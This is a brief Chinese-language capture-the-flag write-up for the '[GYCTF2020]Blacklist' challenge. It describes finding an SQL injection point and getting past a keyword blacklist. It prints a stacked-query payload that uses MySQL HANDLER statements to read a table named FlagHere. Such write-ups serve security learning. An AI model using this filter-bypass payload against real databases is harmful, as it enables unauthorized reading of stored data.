[GYCTF2020]Blacklist
随便输入一个1。url变成了:
buuoj.cn/?inject=1
可以看出来inject是一个sql注入点。
尝试查找数据库。
查找表名。
输入select,可以看到黑名单。
过滤了这么多东西。
百度了一下,发现还有一个handler查找方式。
handler…open:打开一个表
handler…read:访问
handler…close:关闭
构建payload:
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;
成功获取flag。